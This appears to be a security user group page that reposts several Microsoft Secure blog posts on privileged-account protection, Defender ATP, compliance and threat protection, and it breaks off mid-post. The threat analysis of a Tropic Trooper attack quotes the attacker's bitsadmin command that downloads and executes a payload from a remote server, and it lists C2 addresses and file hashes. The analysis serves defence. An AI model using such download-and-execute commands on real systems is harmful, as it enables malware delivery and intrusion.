Swedish Windows Security User Group

In my role, I often meet with CISOs and security architects who are updating their security strategy to meet the challenges of continuously evolving attacker techniques and cloud platforms. A frequent topic is prioritizing security for their highest value assets, both the assets that have the most business value today as well as the initiatives that the organization is banking on for the future. This typically includes intellectual property, customer data, key new digital initiatives, and other data that, if leaked, would do the greatest reputational and financial damage. Once weve identified the highest value assets, it inevitably leads to a conversation about all the privileged accounts that have administrative rights over these assets. Most of our customers recognize that you can no longer protect the enterprise just by securing the network edge; the cloud and mobile devices have permanently changed that. Identities represent the critically important new security perimeter in a dual perimeter strategy while legacy architectures are slowly phased out.

Regardless of perimeter and architecture, there are few things more important to a secure posture than protecting admins. This is because a compromised admin account would cause a much greater impact on the organization than a compromised non-privileged user account.

If you are working on initiatives to secure your privileged accounts (and I hope you are ), this post is designed to help. Ive shared some of the principles and tools that Microsoft has used to guide and enhance our own security posture, including some prescriptive roadmaps to help you plan your own initiatives.

Protect the privileged access lifecycle

Once you start cataloging all the high-value assets and who can impact them, it quickly becomes clear that we arent just talking about traditional IT admins when we talk about privileged accounts. There are people who manage social media accounts rich with customer data, cloud services admins, and those that manage directories or financial data. All of these user accounts need to be secured (though most organizations start with IT admins first and then progress to others, prioritized based on risk or the ability to secure the account quickly).

Protecting the privileged access lifecycle is also more than just vaulting the credentials. Organizations need to take a complete and thoughtful approach to isolate the organizations systems from risks. It requires changes to:

• Processes, habits, administrative practices, and knowledge management.
• Technical components such as host defenses, account protections, and identity management.

Principles of securing privileged access

Securing all aspects of the privileged lifecycle really comes down to the following principles:

• Strengthen authentication:

  • Move beyond relying solely on passwords that are too often weak, or easily guessed and move to a password-less, Multi-Factor Authentication (MFA) solution that uses at least two forms of authentication, such as a PIN, biometrics, and/or a code generated by a device.
  • Make sure you detect and remediate leaked credentials.

• Reduce the attack surface:

  • Remove legacy/insecure protocols.
  • Remove duplicate/weak passwords.
  • Reduce dependencies.

• Increase monitoring and detection.
• Automate threat response.
• Ensure usability for administrators.

To illustrate the importance we place on privileged access controls, Ive included a diagram that shows how Microsoft protects itself. Youll see we have instituted traditional defenses for securing the network, as well as made extensive investments into development security, continuous monitoring, and processes to ensure we are looking at our systems with an attackers eye. You can also see how we place a very high priority on security for privileged users, with extensive training, rigorous processes, separate workstations, as well as strong authentication.

Prioritize quick, high-value changes first using our roadmap

To help our customers get the most protection for their investment of time/resources, we have created prescriptive roadmaps to kickstart your planning. These will help you plan out your initiatives in phases, so you can knock out quick wins first and then incrementally increase your security over time.

Check out the Azure Active Directory (Azure AD) roadmap to plan out protections for the administration of this critical system. We also have an on-premises roadmap focused on Active Directory admins, which Ive included below. Since many organizations run hybrid networks, we will soon merge these two roadmaps.

On-premises privileged identity roadmap

There are three stages to secure privileged access for an on-premises AD.

Stage 1 (30 days)

Stage 1 of the roadmap is focused on quickly mitigating the most frequently used attack techniques of credential theft and abuse.

1. Separate accounts: This is the first step to mitigate the risk of an internet attack (phishing attacks, web browsing) from impacting administrative privileges.

2 and 3. Unique passwords for workstations and servers: This is a critical containment step to protect against adversaries stealing and re-using password hashes for local admin accounts to gain access to other computers.

4. Privileged access workstations (PAW) stage 1: This reduces internet risks by ensuring that the workstations admins use every day are protected at a very high level.

5. Identity attack detection: Ensures that security operations have visibility into well-known attack techniques on admins.

Stage 2 (90 days)

These capabilities build on the mitigations from the 30-day plan and provide a broader spectrum of mitigations, including increased visibility and control of administrative rights.

1. Require Windows Hello for business: Replace hard-to-remember and easy-to-hack passwords with strong, easy-to-use authentication for your admins.

2. PAW stage 2: Requiring separate admin workstations significantly increases the security of the accounts your admins use to do their work. This makes it extremely difficult for adversaries to get access to your admins and is modeled on the systems we use to protect Azure and other sensitive systems at Microsoft (described earlier).

3. Just in time privileges: Lowers the exposure of privileges and increases visibility into privilege use by providing them to admins as they need it. This same principle is applied rigorously to admins of our cloud.

4. Enable credential guard on Windows 10 workstations: This isolates secrets for legacy authentication protocols like Kerberos and NTLM on all Windows 10 user workstations to make it more difficult for attackers to operate there and reach the admins.

5. Leaked credentials 1: This enables you to detect a risk of a leaked password by synchronizing password hashes to Azure AD where it can compare them to known leaked credentials.

6. Lateral movement vulnerability detection: Discover which sensitive accounts in your network are exposed because of their connection to non-sensitive accounts, groups, and machines.

Stage 3: Proactively secure posture

These capabilities build on the mitigations from previous phases and move your defenses into a proactive posture. While there will never be perfect security, this represents the strongest protections against privilege attacks currently known and available today.

1. Review role-based access control: Protect identity and management systems using a set of buffer zones between full control of the environment (Tier 0) and the high-risk workstation assets that attackers frequently compromise.

2. PAW stage 3: Expands your protection by separating internet risks (phishing attacks, web browsing) from all administrative privileges, not just AD admins.

3. Lowers the attack surface of domain and domain controller: This hardens these sensitive assets to make it difficult for attackers to compromise them with classic attacks like unpatched vulnerabilities and exploiting configuration weaknesses.

4. Leaked credentials 2: This steps up the protection of admin accounts against leaked credentials by forcing a reset of passwords using conditional access and self-service password reset (versus requiring someone to review the leaked credentials reports and manually take action).

Securing your administrative accounts will reduce your risk significantly. Stay tuned for the hybrid roadmap, which will be completed in early 2019.

The post Secure your privileged administrative accounts with a phased roadmap appeared first on Microsoft Secure.

Several weeks ago, the Windows Defender Advanced Threat Protection (Windows Defender ATP) team uncovered a new cyberattack that targeted several high-profile organizations in the energy and food and beverage sectors in Asia. Given the target region and verticals, the attack chain, and the toolsets used, we believe the threat actor that the industry refers to as Tropic Trooper was likely behind the new attack.

The attack set off numerous Windows Defender ATP alerts and triggered the device risk calculation mechanism, which labeled the affected machines with the highest risk. The high device risk score put the affected machines at the top of the list in Windows Defender Security Center, which led to the early detection and discovery of the attack.

With the high risk determined for affected machines, Conditional access blocked these machines access to sensitive content, protecting other users, devices, and data in the network. IT admins can control access with Conditional access based on the device risk score to ensure that only secure devices have access to enterprise resources.

Finally, automatic investigation and remediation kicked in, discovered the artifacts on affected machines that were related to the breach, and remediated the threat. This sequence of actions ensured that the attackers no longer have foothold on affected machines, returning machines to normal working state. Once the threat is remediated, the risk score for those machines was reduced and Conditional access restrictions were lifted.

Investigating alert timelines and process trees

We discovered the attack when Windows Defender ATP called our attention to alerts flagging several different suspicious activities like abnormal Office applications activity, dubious cross-process injections, and machine-learning-based indications of anomalous executions flows. The sheer volume and variety of the alerts told us something serious was going on.

Figure 1. Multiple alerts triggered by the attack

The first detection related to the attack was fired by a suspicious EQNEDT32.exe behavior, which led us to the entry vector of the attack: a malicious document that carried an exploit for CVE-2018-0802, a vulnerability in Microsoft Office Equation Editor, which the actor known as Tropic Trooper has exploited in previous campaigns.

Through the tight integration between Windows Defender ATP and Office 365 ATP, we were able to use Office 365 ATP Threat Explorer to find the specific emails that the attackers used to distribute the malicious document.

Using Windows Defender Security Center, we further investigated the detected executable and found that the attackers used bitsadmin.exe to download and execute a randomly named payload from a remote server:

bitsadmin /transfer Cd /priority foreground http:/<IP address>:4560/.exe %USERPROFILE%\fY.exe && start %USERPROFILE%\fY.exe

Machine timeline activity showed that the executed payload communicated to a remote command-and-control (C&C) server and used process hollowing to run code in a system process memory.

In some cases, the attacker ran additional activities using malicious PowerShell scripts. Windows Defender ATPs Antimalware Scan Interface (AMSI) sensor exposed all the attacker scripts, which we observed to be for meant mostly for data exfiltration.

Figure 2. Process tree

Using the timeline and process tree views in Windows Defender Security Center, were able to identity the processes exhibiting malicious activities and pinpoint exactly when they occurred, allowing us to reconstruct the attack chain. As a result of this analysis, we were able to determine a strong similarity between this new attack and the attack patterns used by the threat actor known as Tropic Trooper.

Figure 3. Campaign attack chain

Device risk calculation and incident prioritization

The alerts that were raised for this attack resulted in a high device risk score for affected machines. Windows Defender ATP determines a device risk score based on different mechanisms. The score is meant to raise the risk level of machines with true positive alerts that indicate a potential targeted attack. The high device risk score pushed the affected machines at the top of the queue, helping ensure security operations teams to immediately notice and prioritize. More importantly, elevated device risk scores trigger automatic investigation and response, helping contain attacks early in its lifespan.

In this specific attack, the risk calculation mechanism gave the affected machines the highest risk based on cumulative risk. Cumulative risk is calculated based on the multiple component and multiple types of anomalous behaviors exhibited by an attack across the infection chain.

Windows Defender ATP-driven conditional access

When Windows Defender ATP raises the device risk score for machines, as in this attack, the affected devices are marked as being at high risk. This risk score is immediately communicated to Conditional access, resulting in the restriction of access from these devices to corporate services and data managed by Azure Active Directory.

This integration between Windows Defender ATP and Azure Active Directory through Microsoft Intune ensures that attackers are immediately prevented from gaining access to sensitive corporate data, even if attackers manage to establish a foothold on networks. When the threat is remediated, Windows Defender ATP drops the device risk score, and the device regains access to resources. Read more about Conditional access here.

Signal sharing and threat remediation across Microsoft Threat Protection

In this attack investigation, the integration of Windows Defender ATP and Office 365 ATP allowed us to trace the entry vector, and security operations teams can seamlessly pivot between the two services, enabling them to investigate the end-to-end timeline of an attack.

Threat signal sharing across services through the Intelligent Security Graph ensures that threat remediation is orchestrated across Microsoft Threat Protection. In this case, Office 365 ATP blocked the related email and malicious document used in the initial stages of the attack. Office 365 ATP had determined the malicious nature of the emails and attachment at the onset, stopping the attacks entry point and protecting Office 365 ATP customers from the attack.

This threat signal is shared with Windows Defender ATP, adding to the rich threat intelligence that was used for investigation. Likewise, Office 365 ATP consumes intelligence from Windows Defender ATP, helping make sure that malicious attachments are detected and related emails are blocked.

Meanwhile, as mentioned, the integration of Windows Defender ATP and Azure Active Directory ensured that affected devices are not allowed to access sensitive corporate data until the threat is resolved.
Windows Defender ATP, Office 365 ATP, and Azure Active Directory are just three of the many Microsoft services now integrate through Microsoft Threat Protection, an integrated solution for securing identities, endpoints, user data, cloud apps, and infrastructure.

Conclusion

The new device risk calculation mechanism in Windows Defender ATP raised the priority of various alerts that turned out to be related to a targeted attack, exposing the threat and allowing security operations teams to immediately take remediation actions. Additionally, the elevated device risk score triggered automated investigation and response, mitigating the attack at its early stages.

Through Conditional access, compromised machines are blocked from accessing critical corporate assets. This protects organizations from the serious risk of attackers leveraging compromised devices to perform cyberespionage and other types of attacks.

To test how these and other advanced capabilities in Windows Defender ATP can help your organization detect, investigate, and respond to attacks, sign up for a free trial.

 

 

Hadar Feldman and Yarden Albeck
Windows Defender ATP team

 

 

Indicators of attack (IoCs)

Command and control IP addresses and URLs:

• 199[.]192[.]23[.]231
• 45[.]122[.]138 [.]6
• lovehaytyuio09[.]om

Files (SHA-256):

• 9adfc863501b4c502fdac0d97e654541c7355316f1d1663b26a9aaa5b5e722d6 (size: 190696 bytes, type: PE)
• 5589544be7f826df87f69a84abf478474b6eef79b48b914545136290fee840fe (size: 727552, type: PE)
• 073884caf7df8dafc225567f9065bbf9bf8e5beef923655d45fe5b63c6b6018c (size: 195123 bytes, type: docx)
• 1aef46dcbf9f0b5ff548f492685d488c7ac514a24e63a4d3ed119bfdbd39c908 (size: 207444, type: docx)

 

 

 

---

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

 

The post Windows Defender ATP device risk score exposes new cyberattack, drives Conditional access to protect networks appeared first on Microsoft Secure.

This is the last post in our eight-blog series on deploying Intelligent Security scenarios. To read the previous entries, check out the Deployment series page.

Your employees need to access, generate, and share organizational information ranging from extremely confidential to informal; you must ensure that all information and the movement of that information comply with industry standards without inhibiting workflow. Microsoft 365 security solutions can help you know whats happening with your data, set permissions and classifications, and discover and help prevent leaks.

How can I make it easier to manage compliance processes?

To better manage compliance processes, the first thing youll want to do is distribute the work out to compliance specialists across your organization. The Microsoft 365 Security & Compliance Center (Figure 1) makes this easy by providing a central location to assign people to specific compliance tasks, such as data loss prevention, eDiscovery, and data governance.

Figure 1: The Microsoft 365 Security & Compliance Center Dashboard.

Next, youll need to decide on your policies and data classifications that will allow you to take actions on data. To streamline this compliance task, Microsoft Advanced Data Governance offers automatic data classification and proactive policy recommendationssuch as retention and deletion policiesthroughout the data lifecycle. You can enable default system alerts to identify data governance risks, for example, detecting an employee deleting a large volume of files. You can also create custom alerts by specifying alert-matching conditions, thresholds, or other activities that require admin attention.

How do I assess data protection controls in an ever-changing compliance landscape?

The Microsoft Security Compliance Manager (Figure 2) provides tools to proactively manage evolving data privacy regulations. You can perform ongoing risk assessments on security, compliance, and privacy controls across 11 assessments, including these standards:

• ISO 27001
• ISO 27018
• NIST 800-53
• NIST CSF
• CSA CCM

Plus, regional standards and regulations, including:

• GDPR

As well as industry standards and regulations, such as:

• HIPAA/HITECH
• FFIEC
• NIST 800-171
• FedRAMP Moderate
• FedRAMP High

Additionally, the Compliance Manager provides you with step-by-step guidance of how to implement controls to enhance your compliance posture and keep you updated with the current compliance landscape. In addition, built-in collaboration tools to help you assign, track, and record compliance activities to prepare for internal or external audits.

Figure 2: Compliance Manager provides tools to proactively manage evolving data privacy regulations.

How can I protect my data no matter where it lives or travels?

With employees, partners, and other users sharing your data over cloud services, mobile devices, and apps, you need solutions that understand what data is sensitive and automatically protect and govern that data. The unified labeling experience for Microsoft 365 in the Security & Compliance Center provides a tool that allows you to configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location (Figure 3). You can create and customize labels that define the sensitivity of the datafor example, a label of General means the file doesnt contain sensitive information, while Highly Confidential means the file contains very sensitive information. For each label, you can configure protection settings, such as adding encryption and access restrictions, or adding visual markings such as watermarks or headers/footers. To support data governance compliance, you can set policies for data retention, deletion, and disposition, and then automatically apply or publish these labels to users.

Figure 3: Configure data sensitivity labels and protection policies across Azure Information Protection and Office 365 in one location.

There are over 85 built-in sensitive information types that you can use to automatically detect common sensitive data types that may be subject to compliance requirements, such as credit card information, bank account information, passport IDs, and other personal data types. You can also create your own custom sensitive information types (such as employee ID numbers) or upload your own dictionary of terms that you want to automatically detect in documents and emails.

How can I help protect privileged accounts from compromise?

Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users dont have privileges by default. When permissions are provided, its at the bare minimum with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once received all activities are logged and auditable. Its the same principle that defines how Microsoft gives access to its datacenters and reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on Microsoft.com.

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.

More blog posts from the deploying intelligent security scenario series:

• Enable your users to work securely from anywhere, anytime, across all of their devices
• Protect your data in files, apps, and devices
• Cybersecurity threats: How to discover, remediate, and mitigate
• Protecting user identities
• Collaborate securely
• Secure file storage
• How to share content easily and securely

Other blog posts from the security deployment series:

• Tips for getting started on your security deployment
• Accelerate your security deployment with FastTrack for Microsoft 365
• First things first: Envisioning your security deployment
• Now that you have a plan, its time to start deploying
• Getting the most value out of your security deployment
• New FastTrack benefit: Deployment support for co-management on Windows 10 devices
• Assessing Microsoft 365 security solutions using the NIST Cybersecurity Framework

The post How to help maintain security compliance appeared first on Microsoft Secure.

Across Windows Defender Advanced Threat Protection (Windows Defender ATP) engineering and research teams, innovation drives our mission to protect devices in the modern workplace. Our goal is to equip security teams with the tools and insights to protect, detect, investigate, and automatically respond to attacks. We continue to be inspired by feedback from customers and partners, who share with us the day-to-day realities of security operations teams constantly keeping up with the onslaught of threats.

Today Im excited to share with you some of the latest significant enhancements to Windows Defender ATP. We added new capabilities to each of the pillars of Windows Defender ATPs unified endpoint protection platform: improved attack surface reduction, better-than-ever next-gen protection, more powerful post-breach detection and response, enhanced automation capabilities, more security insights, and expanded threat hunting. These enhancements boost Windows Defender ATP and accrue to the broader Microsoft Threat Protection, an integrated solution for securing identities, endpoints, cloud apps, and infrastructure.

Lets look now at some of the new enhancements to Windows Defender ATP:

New attack surface reduction rules

Attack surface reduction forms the backbone of our answer to a host intrusion and prevention system (HIPS). Attack surface reduction protects devices directly, by controlling and limiting the ways in which threats can operate on a device. Today we are announcing two new rules:

• Block Office communication applications from creating child processes
• Block Adobe Reader from creating child processes

These new rules allow enterprises to prevent child processes from being created from Office communication apps (including Outlook) and from Adobe Reader, right at the workstation level. These help eliminate many types of attacks, especially those using macro and vulnerability exploits. We have also added improved customization for exclusions and allow lists, which can work for folders and even individual files.

Emergency security intelligence updates

Emergency security intelligence updates are new, super-fast delivery method for protection knowledge. In the event of an outbreak, Windows Defender ATP research team can now issue an emergency request to all cloud-connected enterprise machines to immediately pull dedicated intelligence updates directly from the Windows Defender ATP cloud. This reduces the need for security admins to take action or wait for internal client update infrastructure to catch up, which often takes hours or even longer, depending on configuration. Theres no special configuration for this other than ensuring cloud-delivered protection is enabled on devices.

Top scores in independent industry tests

Machine learning and artificial intelligence drive our WDATP solution to block 5 billion threats every month and to consistently achieve top scores in independent industry tests: perfect scores in protection, usability, and performance test modules in the latest evaluation by AV-TEST; 99.8% protection rate in the latest real-world test by AV-Comparatives; and AAA accuracy rating in the latest SE Labs test.

We have added dedicated detections for cryptocurrency mining malware (coin miners) which have increasingly become a problem, even for enterprises. We have also increased our focus on detecting and disrupting tech support scams while they are happening.

Protecting our security subsystems using sandboxing

Weve also continued to invest in hardening our platform to make it harder for malicious actors to exploit vulnerabilities and bypass the operating systems built-in security features. Weve done this by putting Windows Defender ATPs antivirus in a dedicated sandbox. Sandboxing makes it significantly more difficult for an attacker to tamper with and exploit the antivirus solution as a means to compromise the device itself.

Evolving from individual alerts to Incidents

We are introducing Incidents, an aggregated view that helps security analysts to understand the bigger context of a complex security event. As attacks become more sophisticated, security analysts face the challenge of reconstructing the story of an attack. This includes identifying all related alerts and artifacts across all impacted machines and then correlating all of these across the entire timeline of an attack.

With Incidents, related alerts are grouped together, along with machines involved and the corresponding automated investigations, presenting all collected evidences and showing the end-to-end breadth and scope of an attack. By transforming the queue from hundreds of individual alerts to a more manageable number of meaningful aggregations, Incidents eliminate the need to review alerts sequentially and to manually correlated malicious events across the organization, saving up to 80% of analyst time.

The Incident graph view shows you the relations between the entities, with additional details in the side pane when click on an item.

Automating response for fileless attacks

We expanded automation in Windows Defender ATP to automatically investigate and remediate memory-based attacks, also known as fileless threats. We see more and more of these memory-based threats, and while weve had the optics to detect them, security analysts needed special investigation skills to solve them. Windows Defender ATP can now leverage automated memory forensics to incriminate memory regions and perform required in-memory remediation actions.

With this new unique capability, we are shifting from simply alerting to a fully automated investigation and resolution flow for memory-based attacks. This increases the range of threats addressable by automation and further reduces the load on security teams.

Process injection automatically investigated and remediated

Threat analytics

Threat analytics is a set of interactive threat intelligence reports published by our research team as soon as emerging threats and outbreaks are identified. The Threat analytics dashboard provides technical description and data about a threat, and answer the key question, Does WDATP detect this threat?. It also provides recommended actions to contain and prevent specific threats, as well as increase organizational resilience.

But we dont stop there. We also provide an assessment of the impact of threats on your environment (Am I hit?), as well as show a view of how many machines were protected (Were you able to stop this?) and how may are exposed to the threat because they are not up-to-date or are misconfigured (Am I exposed?).

Threat analytics dashboard

Custom detection rules

With Advanced hunting, security analysts love the power they now have to hunt for possible threats across their organization using flexible queries. A growing community of security researchers share their queries with others using the GitHub community repository. These queries can now also be used as custom detection rules, which means that these queries will automatically create and raise an alert when a scheduled query returns a result.

Creating custom detection rules from advance hunting queries

Integration with Microsoft Information Protection

Windows Defender ATP now provides built-in capabilities for discovery and protection of sensitive data on enterprise endpoints. We have integrated with Azure Information Protection (AIP) Data Discovery, providing visibility to labeled files stored on endpoints. AIP dashboard and log analytics will include files discovered on Windows devices alongside device risk info from Windows Defender ATP, allowing customers to discover sensitive data at risk on Windows endpoints.

Windows Defender ATP can also automatically protect sensitive files based on their label. Through Office Security and Compliance (SCC) policy, Windows Defender ATP automatically enables Windows Information Protection (WIP) for files with labels that correspond to Office SCC policy.

Integration with Microsoft Cloud App Security

Windows Defender ATP uniquely integrates with Microsoft Cloud App Security to enhance the discovery of shadow IT in an organization as seen from enterprise endpoints. Windows Defender ATP provides a simplified rollout of Cloud App Security discovery as it feeds Cloud App Security with endpoints signals, reducing the need for collecting signals via corporate proxies and allowing seamless collection of signals even when endpoints are outside of the corporate network.

Through this integration, Microsoft Cloud App Security leverages Windows Defender ATP to collect traffic information about client-based and browser-based cloud apps and services being accessed from IT-managed Windows 10 devices. This seamless integration does not require any additional deployment and gives admins a more complete view of the usage of cloud apps and services in their organization.

Innovations that work for you today and the future

These new features in Windows Defender Advanced Threat Protection unified security platform combine the world-class expertise inside Microsoft and the insightful feedback from you, our customers, who we built these solutions for. We ask that you continue to engage and partner with us as we continue to evolve Windows Defender ATP.

You can test all new and existing features by signing up to a free 60-day fully featured Windows Defender ATP trial. You can also test drive attack surface reduction and next-gen protection capabilities using the Windows Defender demo page or run DIY simulations for features like Incidents, automated investigation and response, and others directly from the Windows Defender security center portal to see how these capabilities help your organization in real-world scenarios.

Meanwhile, the work to stay ahead of threats doesnt stop. You can count on the Windows Defender ATP team to continue innovating, learning from our own experiences, and partnering with you to empower you to confidently protect, detect, and respond to advanced attacks.

 

 

Moti Gindi
General Manager, Windows Cyber Defense

 

 

 

---

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post What’s new in Windows Defender ATP appeared first on Microsoft Secure.

At Ignite 2018, we announced Microsoft Threat Protection, a comprehensive, integrated solution securing the modern workplace across identities, endpoints, user data, cloud apps, and, infrastructure (Figure 1).

The foundation of the solution is the Microsoft Intelligent Security Graph, which correlates 6.5 trillion signals daily from email alone and enables:

• Powerful machine learning developed by Microsofts 3500 in-house security specialists
• Automation capabilities for enhanced hunting, investigation, and remediationhelping reduce burden on IT teams
• Seamless integration between disparate services

Figure 1: Microsoft Threat Protection provides an integrated solution securing the modern workplace

Today, we revisit some of the solution capabilities announced at Ignite and provide updates on significant enhancements made since September. Engineers across teams at Microsoft are collaborating to unlock the full, envisioned potential of Microsoft Threat Protection. Throughout this journey, we want to keep you updated on its development.

Services in Microsoft Threat Protection

Microsoft Threat Protection leverages the unique capabilities of different services to secure several attack vectors. Table 1 summarizes the services in the solution. As each individual service is enhanced, so too is the overall solution.

Attack vector	Services
Identities	Azure Active Directory Identity Protection Azure Advanced Threat Protection Microsoft Cloud App Security
Endpoints	Windows Defender Advanced Threat Protection Windows 10 Microsoft Intune
User data	Exchange Online Protection Office 365 Advanced Threat Protection Office 365 Threat Intelligence Windows Defender Advanced Threat Protection Microsoft Cloud App Security
Cloud apps	Exchange Online Protection Office 365 Advanced Threat Protection Microsoft Cloud App Security
Infrastructure	Use one solution, Azure Security Center, to protect all your workloads, including SQL, Linux, and Windows, in the cloud and on-premises.

Table 1: Services in Microsoft Threat Protection securing the modern workplace attack vectors

Strengthening identity security

By fully integrating Azure Active Directory Identity Protection (Azure AD Identity Protection) with Azure Advanced Threat Protection (Azure ATP) (Figure 2),Microsoft Threat Protection is able to strengthen identity security.Azure AD Identity Protection uses dynamic intelligence and machine learning to automatically protect and detect against identity attacks. Azure ATP is a cloud-powered service leveraging machine learning to help detect suspicious behavior across hybrid environments from various types of advanced external and insider cyberthreats. The integration of the two enables IT teams to manage identities and perform security operations functions through a unified experience that was previously impossible. The integration allows SecOps investigations of risky users between the two products through a single pane of glass. We will start offering customers this integrated experience over the next few weeks.

Figure 2: Integrating Azure ATP with the Azure AD Identity Protection console

Enhanced security for the endpoint

Figure 3 illustrates how Microsoft Threat Protection addresses specific customer challenges.

Figure 3: Microsoft Threat Protection is built to address specific customer challenges

Automation is a powerful capability, promising greater control and shorter threat resolution times even as the digital estate expands. We recently demonstrated our focus on automation by adding automated investigation and remediation capabilities for memory-based/file-less attacks in our industry leading endpoint security service, Windows Defender Advanced Threat Protection (Windows Defender ATP). Now the service can leverage automated memory forensics to incriminate malicious memory regions and perform required in-memory remediation actions. The unique new capability enables fully automated investigations and resolution flow formemory-based attacks, going beyond simply alerting and saving security teams precious time of manual memory forensic effort.

Figure 4 shows the investigation graph of an ongoing investigation in the Windows Defender Security Center. To enable the new feature, run the October 2018 update of Windows 10 and enable the preview features. The capability was released earlier this year and can now mark your alerts as resolved automatically once automation successfully remediates the threat.

Figure 4: Investigation graph of ongoing investigation in Windows Defender Security Center

Elevating user data and cloud app security

Microsoft Threat Protection secures user data by leveraging Office 365 threat protection services, including Office 365 Advanced Threat Protection (Office 365 ATP), which provides best-in-class security in Office 365 against advanced threats to email, collaboration apps, and Office clients. We recently launched Native-Link Rendering, (Figure 5)for both the Outlook Client and the Outlook on the Web applicationenabling users to view the destination URL for links in email. This allows users to make an informed decision before clicking through. This feature was a high demand request from customers who educate users on spotting suspicious links in email and were excited to deliver on it. Office 365 ATP is the only email security service for Office 365 offering this powerful feature.

Figure 5: Native Link Rendering user experience in Office 365 ATP user

Enhancements have also been made in securing cloud apps, beginning with the integration between Microsoft Cloud App Security and Windows Defender ATP. Now, Microsoft Cloud App Security leverages signal from Windows Defender ATP monitored endpoints, enabling discovery and recovery from unsupported cloud service (shadow IT) usage. More recently, Microsoft Cloud App Security further helps reduce impact from shadow IT by providing granular visibility into Open Authentication (OAuth) application permissions that have access to Office 365, G Suite, and Salesforce data. OAuth apps are a newer attack vector often leveraged in phishing attacks, where attackers trick users into granting access to rogue applications. In the managing apps view (Figure 6), admins see a full list of both permissions granted to an OAuth app and the users granting the apps access. The permission level details help admins decide which apps users can continue to have access and which ones will have access revoked.

Figure 6: Microsoft Cloud App Security apps permission management view

Experience the evolution of Microsoft Threat Protection

Take a moment to learn more about Microsoft Threat Protection. Organizations have already transitioned to Microsoft Threat Protection and partners are leveraging its powerful capabilities. Start your trials of the Microsoft Threat Protection services today to experience the benefits of the most comprehensive, integrated, and secure threat protection solution for the modern workplace.

• Windows Defender ATP trial
• Office 365 E5 trial
• Enterprise Mobility + Security (EMS) suite E5 trial
• Azure Security Center trial

 

The post The evolution of Microsoft Threat Protection, November update appeared first on Microsoft Secure.

In my past life as CISO, Ive worked for small companies, state governments, and large enterprises, and one thing that has been true at all of them is that there is an infinite number of security initiatives in each organization you could implement, yet the resources to accomplish those tasks are finite. To be an effective CISO, I had to learn to appropriate the resources under my control toward the solutions that confront the greatest risk to the most valuable parts of the business. I also had to learn how to extend my own resource pool by persuading every individual at the company that they had a role to play in protecting the organization. In short, I learned to aggressively prioritize resources, quantify risk, and influence others.

In this blog, Ill share the methods Ive used to prioritize where and how I spend my resources. There really are just four priorities to achieve the largest security improvements:

1. Identify what is under your control.
2. Formulate a security strategy.
3. Implement good cybersecurity hygiene.
4. Disrupt the cyber kill chain.

Identify the business you are charged with protecting

Before you can begin to allocate your resources, you first need to identify what is under your control. What are the capital and operating budgets available for security, and who are the people responsible for security? You may manage security professionals both inside and outside the company, and you need to know who they are and their strengths and weaknesses. When it comes time to assign people and budgets to your priorities, this knowledge will prove crucial.

You must also know the business. Get clear about which products, services, and lines of business are the biggest drivers of the organizations success. Once you understand what drives the business and the resources you control, you will need to formulate a strategy.

Formulate a security strategy

Understanding the most critical business drivers will help you formulate a security strategy,which Ive written about in more detailin a previous post. When you have your security strategy, youre ready to establish a strong cybersecurity hygiene.

Implement good cybersecurity hygiene

One example of how Ive prioritized security initiatives as a CISO comes from my time at the State of Colorado. When I first stepped into the CISO role in Colorado state government, I needed to modernize their security approach and address vulnerabilities across the enterprise with a very limited budget. I wanted to show results quickly, so I chose to focus on the small things that could be implemented easily and would drive the greatest reduction in risk.

This approachoften referred to as cybersecurity hygieneconcentrates on hardening systems by leveraging secure configurations, putting in place processes and tools to ensure data, devices, and the network are protected against vulnerabilities, and maintaining the patch levels of critical systems

Before you move on to more complex initiatives, be sure youve walked through each of the following steps:

Inventory your network: The first step is to identify every inch of your network, because you cant protect what you cant see. You must know what type of equipment is on your network and whether it is part of internal networks, hosted on the internet, or part of a cloud platform. Once you know what you have, you need to maintain a continuously updated inventory of the hardware and software thats authorized to be on your network.

Scan and patch: When youve identified all the devices and applications on your network, you should scan them from a central point on a regular basis and patch and deactivate themremotelyas necessary. For larger organizations, the scale of this operation is the challenge, especially with limited maintenance windows, a proliferation of web apps and devices, and architectural complexities. Flexible and scalable security scanning services are therefore becoming increasingly necessary.

Continuously look for vulnerabilities: The frequency and complexity of attacks continue to increase, so it is no longer an option to scan your network on a semi-regular basis. You should try to constantly monitor for threats, and quickly address them within your network.

To help you with this process, you can read more details on cybersecurity hygiene. You should also leverage the cloud as it helps you to quickly modernize and sunset legacy and vulnerable systems, provides more automation, and allows you to inherit and extend your security team by gaining from the expertise of the cloud security provider.

Once your systems are hardened and you have a process and tools to continuously monitor your network, you should next focus on interrupting the most common methods hackers use to enter your network, what we refer to as the cyber kill chain.

Understand and disrupt the cyber kill chain

The kill chain is a workflow that cybercriminals deploy to infiltrate a company. Attackers of all sizes have had great success with this approach, so it is worth understanding and then implementing solutions to circumvent it.

External recon: Most hackers begin their attack by gathering intelligence on your company. They collect data on employees, executives, technologies, and supply chain to increase the odds of a successful attack.

Solution: Enable Multi-Factor Authentication to require that users sign in with two forms of verification, reducing the likelihood that theyll be compromised.

Compromised machine: At this stage, the attacker targets a carefully selected employee with a phishing campaign. This campaign is designed to trick the user into executing an attachment or visiting a site that will install a backdoor on the employees computer, giving them the ability to control the computer.

Solution: Implement Office 365 Advanced Threat Protection to protect against malicious files.

Internal recon: Once an attacker has compromised a machine, theyll begin to gather intelligence that is newly available, such as credentials stored locally on the machine. Theyll also map internal networks and systems. This new information will allow them to plan their next move.

